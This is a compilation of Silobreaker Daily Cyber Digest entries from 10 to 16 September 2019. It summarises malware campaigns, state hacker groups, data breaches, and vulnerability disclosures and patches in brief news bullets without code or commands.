Several critical vulnerabilities found in CODESYS products

  • Vulnerabilities were found in CODESYS Control, Gateway V3 and V3 Development System, as well as the CODESYS ENI server. The flaws could be exploited for remote code execution of arbitrary code, denial-of-service attacks, and more.
  • All vulnerabilities, bar one, have been fixed. The remaining is due to be fixed with an update in February 2020.

Source

 

General News

China’s Ministry of State Security allegedly behind cyberattack on Australian parliament

  • Sources claiming to have direct knowledge of the investigation concerning the February 2019 cyberattack on the Australian parliament informed Reuters that the Australian Signals Directorate concluded China was responsible for the attack. Prime Minister Scott Morrison previously stated the attack had likely been carried out by a foreign government.
  • According to one of the sources, the report included the Department of Foreign Affairs recommending this finding be kept secret, so as to avoid disruption to trade relations with China.
  • The Australian government has not released any details of the report or indications on who is believed to be behind the attack, whilst China’s Foreign Ministry denied any involvement.

Source

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Silobreaker Daily Cyber Digest – 16 September 2019

 

Malware

Threat actor observed selling malware containing SpyNote code

  • Researchers at SenseCy observed an Arabic-speaking threat actor, dubbed mobeebom, advertising version 4 of MobiHok RAT on an English hacking forum in July 2019. The threat actor has advertised MobiHok since January 2019, promoting it on Facebook, YouTube, Arabic hacking forums, as well as on mobeebom’s own website.
  • MobiHok is said to have multiple capabilities, including keylogging, bypassing security mechanisms, and taking control of files, cameras, SMS, contacts, apps, settings and more.
  • According to SenseCy’s analysis of the malware sample, mobeebom based MobiHok’s source code on SpyNote and added only minor changes, yet aims to sell it as new and ‘make it the top Android RAT on the market.’

Source

 

Ongoing Campaigns

Update to Nemty Ransomware adds processes and service killer feature

  • Security researcher Vitali Kremez discovered code changes to Nemty Ransomware which allow the malware to kill processes and services while a user is running them. 
  • The updated code targets WordPad, Microsoft Word, Outlook, SQL, VirtualBox and more. Bleeping Computer suggested that the inclusion of SQL and VirtualBox indicates that the malware will be used to target corporate victims.
  • The authors also updated a blacklist which prevents the malware encrypting files on devices in Azerbaijan, Armenia, Kyrgyzstan, and Moldova.  The various updates to Netmy’s code may have been triggered by the lukewarm response that the ransomware has generated in the cybercriminal underground.

Source (Includes IOCs)

 

InnfiRAT targets cryptocurrency wallets

  • Researchers at Zscaler identified a new remote access trojan written in .NET which they dubbed InnfiRAT. The malware can steal passwords, usernames, session data, and take screenshots on a victim’s device. InnfiRAT is also configured to detect and steal cryptocurrency wallet information for products such as Bitcoin and Litecoin.
  • Stolen information is exfiltrated to the attackers C2, and attackers can also instruct InnfiRAT to download additional malware onto compromised devices.

Source (Includes IOCs)

 

Spam campaign delivering Ordinypt malware targets German users

  • Bleeping Computer identified a new campaign targeting German users with Ordinypt malware. The campaign appears to have begun on September 11th, 2019, and is delivered via an email purporting to be from ‘Eva Richter’ and contains an executable disguised as a PDF resume.
  • Users who open access the malicious attachment will infect their system with Ordinypt. The malware pretends to be ransomware and appears to encrypt the target’s files. In actuality, Ordinypt wipes files, deletes shadow volume copies and disables the Windows 10 recovery environment.
  • The attackers leave a note demanding a Bitcoin payment in exchange for a decryptor. Victims should not pay the ransom as their files cannot be recovered via this method. 

Source (Includes IOCs)

 

Gorgon Group spotted using new malware sample

  • Security researcher StrangerealIntel identified that the Gorgon Group are using new malware while retaining the same TTPs and accounts. The attack begins via a VBA macro which is contained in a malicious document, which then connects with Pastebin, running scripts that obfuscate the attack to load an older Delphi version of AZORult stealer.
  • A full analysis of the attack is available via StrangerealIntel’s report.

Source (Includes IOCs)

 

Clients targeted by phishing attacks following attack on Coinhouse

  • The French cryptocurrency exchange Coinhouse was targeted in a phishing attack on September 12th, 2019, after which hackers gained access to its client database containing names and email addresses. Using the client data, the hackers then sent phishing attacks against Coinhouse clients.
  • In response to the attack, Coinhouse switched the platform to a maintenance mode to prevent hackers from gaining access to user funds. Coinhouse has advised its customers not to click any emails sent about its company.

Source

 

NoxPlayer observed delivering malware

  • Users of NoxPlayer are reporting that the popular gaming emulator is delivering Segurazo, yet the malware is only detected as a Potentially Unwanted Program (PUP) by anti-virus solutions.
  • PUP files are often added to emulators, but are generally non-threatening, meaning many users may not be aware of the malware’s presence. Segurazo also appears to use tactics to evade anti-virus countermeasures, making it more difficult to remove from a user’s system.

Source

 

Hacker Groups

US Treasury sanctions state-sponsored North Korean hacker groups

  • On September 13th, 2019, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced sanctions against the Lazarus Group, Bluenoroff and Andariel. The US assert that Lazarus Group was created as early as 2007 by the cyber operations wings of North Korea’s Reconnaissance General Bureau (RGB). Bluenoroff and Andariel are designated as sub-groups of Lazarus. 
  • Lazarus Group have previously targeted a multitude of organisations including those involved in defence, finance, critical infrastructure, the media, and manufacturing. The group were also involved in distributing Wannacry Ransomware.
  • Since 2014, Bluenoroff have been conducting cyberheists against foreign institutions. The US states that stolen funds are used in part to fund the regime’s weapon development programmes. 
  • Andariel were first identified in 2015 and consistently conduct operations against South Korea’s government, infrastructure and military. The purpose of these attacks is to generate capital, exfiltrate information, and cause disruption. 

Source

 

Leaks and Breaches

Bold[.]com exposes data through unprotected Elasticsearch cluster

  • On August 10th, 2019, researchers at Security Discovery identified an unprotected Elasticsearch cluster which belonged to the infrastructure team at Bold[.]com. Exposed information included tickets which contained sensitive information relating to internal infrastructure. The exposed cluster also contained database and administrator logins.
  • Administrators were notified on August 10th, 2019, and database was restricted on the same day.

Source

 

Hungarian Development Centre suffers data breach

  • According to Hungarian media site 24[.]hu, a data breach on the Hungarian Development Centre (MFK) in mid-July 2019 destroyed its entire database containing official documentation, contracts, invoices, corporate software, and more. 24[.]hu claims the attack most likely came from North Korea.
  • The Ministry of Foreign Affairs and the Foreign Ministry of Hungary confirmed the data breach, however, stated that MFK immediately shut down its system upon discovering the attack and that no data was lost as a result.

Source

 

Vulnerabilities

XSS vulnerability found in FileBird Lite plugin

  • Plugin Vulnerabilities noticed a threat actor probing the WordPress FileBird Lite plugin and discovered it contains a cross-site scripting (XSS) vulnerability, as well as further insecure code, some of which lacks a nonce check to prevent cross-site request forgery (CSFR). Both the XSS vulnerability and CSFR could allow anyone logged into WordPress to inject malicious JavaScript code.

Source

 

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Silobreaker Daily Cyber Digest – 13 September 2019

Malware

Newly discovered WiryJMPer dropper used to deliver Netwire Rat

  • Researchers at Avast discovered a new dropper, dubbed WiryJMPer, hiding as an ABBC Coin wallet. The malware attempts to hide its installation from the user by displaying program windows in the foreground. Once opened the dropper is used to deliver the remote access trojan NetWire RAT
  • NetWire RAT can be used to control the target computer, record keystrokes, steal passwords, and more.

Source 1 Source 2 (Includes IOCs)

 

New Glupteba trojan variants found written in Golang

  • Researchers at Cybereason discovered new variants ofGluptebawritten in Golang. The use of Golang allows threat actors to make the malware executable across several operating systems despite only compiling it on a system using only one repository.
  • The researchers also observed the malware implementing a cryptocurrency miner and using the living-off-the-land technique to gain access and persistence. Yet they note the malware failed to evade detection, whilst also using contradicting techniques.
  • A full analysis of the infection method is available on Cybereason’s blog.

Source (Includes IOCs)

 

Ongoing Campaigns

Newly identified ‘Simjacker’ attack can deliver malware through SMS

  • Researchers at AdaptiveMobile Security identified a new vulnerability and exploit that has been employed to carry out surveillance on individuals in a multitude of countries. The attack, dubbed Simjacker, has been conducted for at least two years by an unnamed private company that works with governments.
  • The attack involves sending an SMS with SIM Toolkit (STK) instructions to a target mobile. The SMS can be sent from a handset, a GSM modem or an A2P account connected to an SMS sending account. The attack targets the S@T Browser within the UICC/eUICC (SIM Card) and uses the S@T Browser library as its execution environment to trigger logic on the handset.
  • The attack then requests location and specific device information from the mobile. Stolen information is then sent to the attacker via SMS. Victims of the attack are unaware of either incoming or outgoing texts.
  • The researchers tested the attack and found that they could use it to provide local information, launch browsers, open channels, set up phone calls, and more.  Additionally, the attack works on devices from ‘nearly every manufacturer’ including Apple, ZTE, Samsung, Google, IoT devices with SIM cards, and more.

Source

 

Irish mailboxes targeted with sextortion scam

  • Researchers at ESET identified several related sextortion emails being delivered to Irish mailboxes. The scammers claim to have access to the victim’s computer and accuse the target of accessing child pornography. The scammers then demand £5000 in Bitcoin.

Source

 

Leaks and Breaches

Garmin South Africa customer details stolen following portal breach

  • On September 12th, 2019, Garmin Ltd announced that customers who bought products through Garmin South Africa’s payment portal have had their personal data compromised. Stolen personal information included phone numbers, email addresses, and first and last names.  Exposed payment information included card numbers, expiration dates and CVV codes.
  • Garmin did not disclose the exact details of the attack. However, security researcher Jérôme Segura suggested that the type of data exfiltrated and the fact that the portal ran on Magento CMS indicated that the attackers may have used a Magecart skimmer.

Source 1 Source 2

 

Major fraud network uncovered after discovery of unsecured database

  • vpnMentor researchers uncovered a major criminal operation after discovering an unsecured database containing a cache of 17 million emails and 1.2 terabytes of data. According to vpnMentor, the owners of the database are the same fraud group that Groupon has been monitoring since 2016. However, Groupon stated that although similarities were found, no evidence that they are related or connected was found.
  • The initial investigation suggested the database was exposing personal details of individuals purchasing tickets on Neuroticket, Ticketmaster and Tickpick, yet further research showed that 90% of the records on the database linked to Groupon.
  • The database was found not to be linked to any of the affected vendors and to contain fraudulent accounts that were used for purchasing tickets that would later be resold at full or higher prices. The researchers also discovered a ransom note demanding $400 in Bitcoin, suggesting at least one criminal had hacked the database and was attempting to extort the owners.

Source 1 Source 2

 

Vulnerabilities

WordPress contains XSS zero-day vulnerability

  • Researchers at Fortinet identified a vulnerability in WordPress versions 5.0 to 5.2.2. The XSS issue is caused by WordPress’s built-in editor Gutenberg’s failure to filter JavaScript/HTML code in the Shortcode error message.
  • The issue can be exploited by a remote attacker with contributor privileges or higher and can be used to execute arbitrary JavaScript/HTML code in the browser of victims who access the compromised page.
  • If a visitor to the page has administrator rights the attacker could exploit the vulnerability to add themselves as an administrator through WordPress’s GetShell function. An attacker who gained administrator rights could then take control of the webserver.

Source (Includes IOCs)

 

Trend Micro publishes technical brief on critical Internet Explorer vulnerability

  • Trend Micro published an analysis on a use-after-free vulnerability, tracked asCVE-2019-1208, which could allow threat actors to gain the same privileges as the user of the impacted system. If a user has administrative access, threat actors could hijack their system to install or uninstall programmes, view and modify data, create user accounts with full privileges, and more.
  • The flaw could be triggered using VBScript Class through multiple steps. In response to the discovery, VBScript was disabled for Internet Explorer 11 in Windows 7, 8, and 8.1, however according to Microsoft, VBScript could be enabled via Registry or Group Policy.
  • The vulnerability was patched in Microsoft’s September Patch Tuesday.

Source

 

Facebook patch Instagram flaw that allowed phone number to be linked to user details

  • Researcher ZHacker13 identified a vulnerability in Instagram that used a combination of brute force and the platforms contact import feature to access account details and phone numbers.
  • The first stage of the attack employs an algorithm to brute force Instragram’s login form. The algorithm checks phone numbers to determine if they are linked to a live account.  When an attacker identifies a live phone number, they can abuse Instagram’s Sync Contact feature to link the number to an account. Exposed data included users’ real names, Instagram account numbers and handles, and full phone numbers.
  • The researcher reported the vulnerability in early August. Facebook has now patched the issue and the attack no longer works.

Source

 

General News

Former US officials claim Israel planted spying equipment near White House

  • According to Politico, three former US officials claimed that the international mobile subscriber identity-catchers (IMSI-catchers), also known as StingRays, that were discovered in 2017 were placed there by Israel. IMSI-catchers are a type of surveillance device that imitate cell towers and are used to capture calls and data use.
  • Israeli Embassy spokesperson Elad Strohmayer has denied the allegations, calling them ‘absolute nonsense,’ whilst Prime Minister Benjamin Netanyahu referred to them as ‘a complete fabrication,’ stating that Israel has a directive not to undertake any intelligence work in the US.

Source

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Silobreaker Daily Cyber Digest – 12 September 2019

 

Malware

New Trickbot malware dropper contains 10k lines of code

  • Researchers at Cybaze-Yoroi ZLab analysed a new dropper employed by TrickBot operators composed of several thousand highly obfuscated lines of code. The dropper abuses the old Windows File System feature Alternate Data Stream.
  • The JavaScript dropper contains nearly 10,000 lines of obfuscated code that uses randomisation techniques to rename variables and comments. It also includes chunks of junk instructions, most likely to ensure a low detection rate, which the researchers warn makes it pose an increased threat to companies and users.
  • A full analysis of the code is available on Cybaze-Yoroi ZLab’s blog.

Source (Includes IOCs)

 

Ongoing Campaigns

New Kimsuky campaign targets US-based entities using trojanised documents

  • Prevailion researchers observed a new campaign, dubbed Autumn Aperture, in which official documents written by industry experts were trojanized and sent to US-based entities, in the summer of 2019. The researchers have linked the campaign to Kimsuky, a North Korean hacker group also known as Velvet Chollima or Smoke Screen.
  • Using socially engineered emails, the documents are sent as Word files, with the trojan embedded in a Kodak FlashPix (FPX) file, a format less likely to be detected as malicious by anti-virus solutions. In some cases, the threat actors also sent Bitly links, which would redirect a user to a webpage that downloads a file RAR containing a trojanised document.
  • The documents concern nuclear deterrence, North Korea’s nuclear submarine programme, and North Korean economic sanctions, with some having been used in previous Kimsuky campaigns. This campaign saw new functionalities added by the group, including the use of FPX files, enumeration of the host machine, experimentation with password protection for the documents and added additional anti-virus solutions that are checked for by the dropper.

Source (Includes IOCs)

 

New malware that steals classified files has links to Ryuk

  • Security researchers at MalwareHunterTeam identified a malware that is used to detect and exfiltrate files relating to finance, the military and law enforcement. The malware shares certain code similarities with Ryuk malware but is designed to steal files rather than encrypt them.
  • Security researcher Vitali Kremez analyzed the virus. Upon execution the malware runs a recursive scan and checks for Word and Excel files. Detected files are then checked against a list of 77 strings for phases such as ‘hack’, ‘tank’, ‘secret’, ‘federal’ and ‘military’.  Files that match a string are then uploaded to an FTP site that is controlled by the attacker.
  • The malware also contains a blacklist in order to avoid folder and files which contain terms such as ‘Windows’, ‘Intel’, ‘Mozilla’ and ‘Ryuk’. It is unknown if the author behind the malware has links to Ryuk or has altered its code. Bleeping Computer, MonsterHunterTeam, and Vitali Kremez suggested that the virus is intended to be run prior to an encryption attack.

Source (Includes IOCs) 

 

Virtual disk files can be abused to deliver malware

  • Security researcher Will Dormann discovered that attackers can bypass initial AV defences in Windows by mounting their malware inside VHD and VHDX disk image downloads. Windows does not scan the container or mark it as potentially dangerous. 
  • Researchers tested out the attack vector and discovered that products which would normally detect malicious files overlook them when stored in a VHD file. Security researcher Jan Poulsen constructed a script that mounted the VHD automatically and then executed the malware. The researcher attached the VHD to Gmail and downloaded the file with Google Chrome onto a device running Windows Defender. The malicious file was not detected at any point in this process.
  • Poulsen also managed to get the malware to execute on a target system by automating the mounting process using the ‘diskpart’ command-line disk partition in Windows. Upon execution the malware was finally detected and stopped by antivirus products.

Source 1 Source 2

 

New campaign delivers Astaroth trojan using Facebook and YouTube profiles

  • Researchers at Cofense Intelligence observed a campaign delivering Astaroth trojan that is exclusively targeting Brazilian citizens, similar to another campaign conducted in September 2018. According to the researchers, 8,000 machines were compromised within a week.
  • The malware is delivered via emails using an invoice theme, a show ticket theme, or a civil lawsuit theme, which encourages users to download and open a HTM file, thereby starting the infection chain.
  • Multiple stages of infection are involved, including the downloading of two DLL files, which are joined together and side-loaded into a legitimate programme that can bypass security measures. The technique of ‘process hollowing’ is then used to inject malicious code into programmes, after which Astaroth retrieves C2 configuration data and starts collecting sensitive data of the user, including financial information, stored passwords, email client credentials, SSH credentials, and more.
  • The researchers found that the C2 configuration data is hosted and maintained by using YouTube and Facebook profiles. The data is present within Facebook posts or profile information of YouTube user accounts, which enables the threat actors to bypass network security measures.

Source (Includes IOCs)

 

Watchbog cryptomining botnet exploits unpatched web application to access systems

  • Researchers at Cisco Talos identified an attack in which Watchbog malware infected a victim’s system via a vulnerability, tracked as CVE-2018-1000861. The flaw exists in the Staple web framework for versions up to Jenkins 2.138.1 or 2.145 which handles HTTP requests.
  • The Linux based Watchbog malware is used to mine Monero cryptocurrency. The attackers behind this campaign did not try to hide their activity and relied on Pastebin for their C2.  Additionally, the attackers left a note on infected systems claiming that they wanted ‘To keep the internet safe’ and stating that ‘We only Wanna Mine’.

Source (Includes IOCs)

 

Hacker Groups

Cobalt Dickens conducts global campaign targeting universities

  • Researchers at Secureworks discovered that the hacker group Cobalt Dickens are conducting a campaign targeting universities. The researchers suggested that the group are likely linked to the Iranian government. The recent campaign, which was discovered in July and August 2019, targeted over 60 universities in Australia, the US, the UK, Canada, Hong Kong, and Switzerland.
  • The TTPs employed by Cobalt Dickens in this recent attack have remained largely consistent with those observed in previous campaigns. The group use compromised university resources to deliver emails which contain links to fake login pages associated with universities. Entered credentials are recorded by the attacker before the target is redirected to a genuine login site.
  • The group were observed using publicly available tools such as the SingleFile plugin and HTTrack Website Copier. Cobalt Dickens also registered twenty new domains, many of which use valid SSL certificates which were predominantly signed by Let’s Encrypt.  As of September 11th 2019, the researchers have observed Cobalt Dickens targeting at least 380 universities in over 30 countries.

Source (Includes IOCs)

 

Leaks and Breaches

Entercom hit by ransomware attack

  • Entercom Communications Corp was hit by a ransomware attack over the weekend of September 7th, 2019, affecting its emails, phones, music scheduling, production, billing, and other internal digital systems.
  • According to Radio Insight, the company will not be paying the $500,000 ransom that was demanded.

Source 1 Source 2

 

Personal data of 8,253 Agora users accidentally exposed by Unicef

  • On August 26th, 2019, the United Nations Children’s Fund (Unicef) accidentally sent a spreadsheet containing the personal data of 8,253 users of its Agora learning portal to roughly 20,000 users. According to Unicef, it has disabled the functionality that allows reports to be sent and also blocked the Agora server from sending emails with attachments as a prevention measure.
  • Exposed data may have included names, email addresses, duty stations, gender, organisation, name of supervisor and contract type.

Source

 

Dealer Leads LLC exposes 198 million records

  • On August, 19th, 2019 researchers at Security Discovery identified a publicly accessible Elastic database belonging to Dealer Leads LLC. The dataset contained 413GB of data and 198 million records.
  • The database contained information on those looking to purchase automobiles. Data included loan and finance information, vehicle information, and the IP addresses of website visitors.  Additional information included names, email addresses, phone numbers, and more. The database was secured after the researchers made contact with the company on August 20th. 2019.

Source

 

Vulnerabilities

Vulnerability found in Libra’s Move modules

  • The vulnerability was present in the Move IR compiler of the Libra Move modules and could allow for inline comments to be disguised as executable code. The flaw allows anyone with rights to publish Move modules to deceive users, with varying levels of potential impact.
  • The vulnerability was fixed in commit 7efb022.

Source

 

Travelpayouts plugin update contains incomplete vulnerability fixes

  • A new version of the WordPress Travelpayouts plugin, which was meant to be a security update, was found to contain an incomplete fix for a vulnerability, whilst another related issue was found to be left unfixed, leaving the plugin vulnerable to persistent cross-site scripting (XSS) attacks.

Source

 

Intel patches vulnerability in Easy Streaming Wizard

  • Intel patched a vulnerability, tracked as CVE-2019-11166, in Easy Steaming Wizard versions 2.1.0731 and previous. The issue exists due to improper file permission in the Easy Steaming Wizard installer. An authenticated local user can exploit the vulnerability to escalate their privilege.
  • A second vulnerability, tracked as CVE-2019-11184, impacts Intel Xeon E5, E7 and SP families that support Data Direct I/O Technology (DDIO) and Remote Direct Memory Access (RDMA). The vulnerability can be exploited by an attacker with adjacent access and can potentially be leveraged to disclose information.
  • Intel have not issued a patch for CVE-2019-11184 but have recommended that untrusted access to DDIO and RDMA enabled systems are limited.

Source

 

Bitcoin’s Lightning Network vulnerabilities discovered in the wild

  • On September 10th, 2019, Lightning Labs stated that vulnerabilities that were discovered in August 2019 are now being exploited in the wild. Exploitation of the issues, tracked as CVE-2019-12998, CVE-2019-12999, and CVE-2019-13000, could result in funds being lost from accounts.  Lightning Labs urged Lightning Network users to update their systems in order to mitigate the issue.

Source

 

Chrome 77 fixes 52 security issues including one critical vulnerability

  • The critical vulnerability, tracked as CVE-2019-5870, was discovered by Guang Gong and is a use-after free vulnerability in the media component. The patch also fixed 8 high severity issues, 17 medium risk issues, and 10 low severity issues. A full list of patched vulnerabilities is available via Google.

Source 1 Source 2

 

Critical vulnerability patched in SAP NetWeaver

  • SAP released their security notes for September 2019 and addressed one new critical vulnerability, tracked as CVE-2019-0355, in SAP NetWeaver AS for Java. The issue exists in ‘the SAP default implementation of the HTTP PUT method that allows attackers to bypass the input validation check.’  Successful attackers would gain the ability to upload dynamic web content and take control of the whole application.
  • Updates were also applied to patches that have previously been released for three other critical flaws. A full list of CVEs and impacted products is available via SAP.

Source 1 Source 2

 

Siemens warns customers that Windows RDS vulnerabilities impact some products

  • Siemens informed customers that some of its Healthineers products are impacted by a series of  Windows RDS vulnerabilities known as DejaBlue. The company is working on patches for some products but also advised users to install Microsoft’s patches.
  • Siemens warned users that many products are also impacted by Linux kernel vulnerabilities related to the handling of SACK packets. The company released some patches but warned most users to use robust security practices and to limit network access to vulnerable devices.

Source

 

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Silobreaker Daily Cyber Digest – 11 September 2019

Ongoing Campaigns

Exim vulnerability exploited to deliver Sustes malware

  • Positive Technologies researchers detected a wave of attacks in which the Exim mail server vulnerability CVE-2019-10149 is exploited to deliver the cryptominer Sustes.
  • The malware is delivered using two methods. The first one involves a chain of scripts that installs the Monero miner on the host and adds it in crontab. One of the scripts adds a public SSH key to a user’s ‘authorized_keys’, which allows an attacker to obtain SSH access to the systems without a password.
  • The second method involves a chain of Python scripts, one of which contains a scanner for random Redis servers. Similar to the first method, the malware adds itself to crontab for autorun and adds its own key a list of trusted SSH keys.

Source (Includes IOCs)

 

Cylance researchers publish analysis of TrickBot malware

  • Trickbot malware was discovered in the wild in 2016 and continues to be updated and developed. The malware attempts to steal information and perform man-in the-middle attacks on banking websites.
  • The malware is delivered through emails and illegitimate websites, with malicious emails primarily relating to banking topics. Targets are often asked to enable document editing at which point a macro uses a script to enable a PowerShell to download the malware.
  • Upon execution the malware pulls files from its C2. Additional DLL files give the malware reconnaissance functions and allow it to steal a wide variety of information. The malware also contains worm modules which allow it to spread across local networks.
  • A full technical analysis is available via Cylance.

Source (Includes IOCs)

Leaks and Breaches

Premier Family Medical hit by ransomware attack

  • A ransomware attack on the Utah-based physician group Premier Family Medical took place on July 8th, 2019, and may have exposed private health information of 320,000 patients. All ten of its Utah County locations were impacted. It is unclear whether a ransom was paid.

Source 1 Source 2

 

Private data of 2 million Verizon Pay Monthly customers exposed

  • Security researcher Daley Bee was able to access 2 million Verizon Pay Monthly contracts after bruteforcing GET parameters for a Verizon-owned subdomain, allowing him to be treated as an authenticated user. The subdomain is used by employees to access internal Point of Sales tools and view customer information.
  • Exposed data includes full names, addresses, mobile numbers, model and serial number of purchased devices, and signatures.

Source

 

Community Psychiatric Clinic data breaches affect 15,537 patients

  • Mental health services provider Community Psychiatric Clinic suffered three separate email security breaches, affecting 3,030, 6,641, and 5,866 patients respectively. The breaches were reported to the Department of Health and Human Services’ Office for Civil Rights’ on August 15th, 2019.
  • It is unclear whether the three breaches include two data breaches previously reported on, which took place on March 12th and May 8th, 2019.

Source

 

Vulnerabilities

Vulnerabilities found in OpenEMR

  • Two vulnerabilities were discovered affecting the open-source medical records management tool OpenEMR version 5.0.1(6). Older versions are also believed to be affected. The flaws were patched with version 5.0.2.
  • CVE-2019-8371, an arbitrary remote code execution vulnerability, could allow attackers to modify files within the OpenEMR application web root.
  • CVE-2019-8368 is a cross-site scripting flaw that could enable attackers to execute arbitrary JavaScript and could affect administrative users, which could lead to a full server compromise.

Source (Includes IOCs)

 

XSS flaw found in Premium Addons for Elementor WordPress plugin

  • Plugin Vulnerabilities researchers discovered the authenticated persistent cross-site scripting (XSS) flaw after noticing a hacker probing usage of the WordPress plugin ‘Premium Addons for Elementor’. The researchers also found further insecure code, suggesting the plugin may contain additional vulnerabilities.

Source

 

Microsoft Patch Tuesday fixes two-zero days

  • On September 10th, 2019, Microsoft released their monthly security update which patched 80 CVEs across 15 products and services. 17 issues are rated as critical and a further 62 are assessed as important.  
  • Two zero-day issues, tracked as CVE-2019-1215 and CVE-2019-1214, are privilege elevation vulnerabilities. The former exists in the way Winsock handles objects in memory and the latter is related to the way Windows Common Log File System handles objects in memory.
  • Three vulnerabilities, CVE-2019-1235 in Windows Text Service Framework, CVE-2019-1253 in Windows AppX Deployment Server and CVE-2019-1294 in Windows Secure Boot were also publicly disclosed. 

Source

 

Adobe release patches for arbitrary code execution

  • On September 10th, 2019, Adobe released patches for three security vulnerabilities in Adobe Flash Player and Adobe Application Manager.
  • Adobe Flash Player contains two critical vulnerabilities tracked as CVE-2019-8070 and CVE 2019-8069. Both flaws could lead to arbitrary code execution.
  • CVE-2019-8076 is a flaw related to a DLL hijacking vulnerability which could enable arbitrary code execution within the Application Manager.

Source

 

Multiple vulnerabilities uncovered in D-Link and Comba Telecom network products

  • Trustwave researcher Simon Kenin discovered that the D-Link DSL-2875AL router is impacted by a vulnerability which was previously identified in other D-Link products. An attacker could exfiltrate both router settings and the password, which is stored in clear text, by sending a crafted request to the web management server.  This attack can be performed without authentication.
  • DSL-2875AL and DSL-2877AL models also display HTML code on their login page which corresponds to the credentials required to authenticate with the Internet service provider.
  • Credential vulnerabilities were also identified in Comba Telecom’s AC2400 Wi-Fi Access Controller, AP2600-I Wi-Fi Access Point and AP2600 Wi-Fi Access Point. 

Source 1 Source 2

 

Basic Laboratory Information System (BLIS) impacted by two critical vulnerabilities

  • CVE-2019-5617 impacts BLIS 3.5 and earlier. The flaw is due to issues in authentication and authorization verification and can lead to unauthenticated password resets.
  • CVE-2019-5644 impacts BLIS 3.51 and earlier can cause unauthenticated updates to user data and includes admin privilege escalation.
  • A third vulnerability, tracked as CVE-2019-5643, is rated as high severity. The flaw impacts BLIS 3.51 and earlier, and can lead to unauthenticated enumeration of facilities and usernames.  

Source

 

Intel chip vulnerability allows attackers to steal sensitive information

  • Researchers at VUSec discovered a vulnerability in Intel’s performance enhancing Data-Direct I/O (DDIO) technology. DDIO is used in recent Intel server grade processors and solves bottleneck constraints by allowing peripherals to operate direct cache access on the CPU’s last-level cache.
  • The researchers developed an attack, dubbed NetCAT, which they claim is the ‘first network-based cache attack on the processor’s last level-cache of a remote machine’.  When Remote Direct Memory Access (RDMA) and DDIO are enabled an attacker can perform a side channel attack by sending specially crafted network packets to a DDIO-capable CPU.
  • The researchers showed that they could then perform a keystroke timing attack to identify what a target was typing in a private SSH session.
  • Intel classified the issue as low severity but did advise disabling DDIO and RDMA on affected CPUs or limiting direct access to vulnerable systems from untrusted networks.

Source 1 Source 2

 

Local privilege escalation vulnerability found in Microsoft Windows 10

  • Fortinet researchers discovered an additional vulnerability, tracked as CVE-2019-1287, capable of local privilege escalation in Windows Network Connectivity Assistant affecting Windows 10 Enterprise or Education versions. A patch was released with the latest update.
  • The vulnerability allows for process creation impersonation that can lead to privilege escalation when a Remote Procedure Call server tries to impersonate the client and start a process at the same time without the use of an explicit token.
  • A similar flaw was previously found and reported to Microsoft, however no patch was made available.

Source

 

Microsoft Teams package can be used to deliver malware

  • Researcher Reegun Richard identified an EXE sideloading attack that abuses the Squirrel installation and update framework to execute malicious payloads using mock installation folders. 
  • Impacted products that use the Squirrel installation and update framework include WhatsApp, Grammarly, GitHub, Slack, and Discord.
  • The researcher tested the attack by crafting a fake Microsoft Teams package that leverages a signed binary to execute in a specific location. Microsoft were informed of the issue but stated that it ‘did not meet the bar of a security issue’.

Source

 

General News

Menstruation apps found to be sharing data with Facebook

  •  A study by Privacy International found that multiple menstruation apps are sharing personal data with Facebook, as well as other third parties. The apps include Maya by Plackal Tech, MIA by Mobapp Development Limited, My Period Tracker by Linchpin Health, Ovulation Calculator by Pinkbird, and Mi Calendario by Grupo Familia.
  •  According to Privacy International, the type of information a user enters into the apps could be considered health or medical data, which is deemed sensitive data under EU data protection laws. The researchers also noted that all apps inform Facebook when a user opens it before a user has agreed to the apps’ privacy policies.
  • Plackal Tech has since removed Facebook SDK and Analytics SDK from its app. Facebook SDK is used for the integration of an app with Facebook’s platform.

Source

 

Members of major dark web counterfeit currency ring arrested

  • Europol announced that the Portuguese Judicial Police, in cooperation with Europol, arrested five individuals who were part of Europe’s second-largest counterfeit currency network on the dark web. The individuals are accused of counterfeiting and organised crime.
  • A total of 1833 counterfeit banknotes, as well as computers, printers, security papers with security thread incorporation, and more were seized following the arrest.

Source

 

International operation to prevent BEC attacks lead to arrest of 281 individuals

  • On September 10th, 2019, the US Department of Justice announced the results of a multi-agency investigation, named Operation reWired, which led to the arrest of 74 people in the US and 207 overseas on charges relating to financial fraud. 167 individuals were arrested in Nigeria, 18 in Turkey, and 15 in Ghana. Further arrests were also made in France, Italy, Japan, Kenya, Malaysia, and the UK.
  • Operation reWired took place over a period of four months and involved organizations including the US Department of Homeland Security, the US Department of Justice, the US Department of the Treasury, and multiple partner organizations overseas. The investigation disrupted BEC schemes and resulted in the seizure of $3.7 million.
  • The FBI also published information on September 10th, 2019, which showed that between June 2016 and July 2019, over $26 billion was reportedly lost globally in BEC scams.

Source 1 Source 2

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Silobreaker Daily Cyber Digest – 10 September 2019

 

Malware

DHS publishes analysis of ELECTRICFISH

  • The report by the US Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Agency looks at two variants of ELECTRICFISH, a malware attributed to the North Korean government and referred to as HIDDEN COBRA by the DHS.
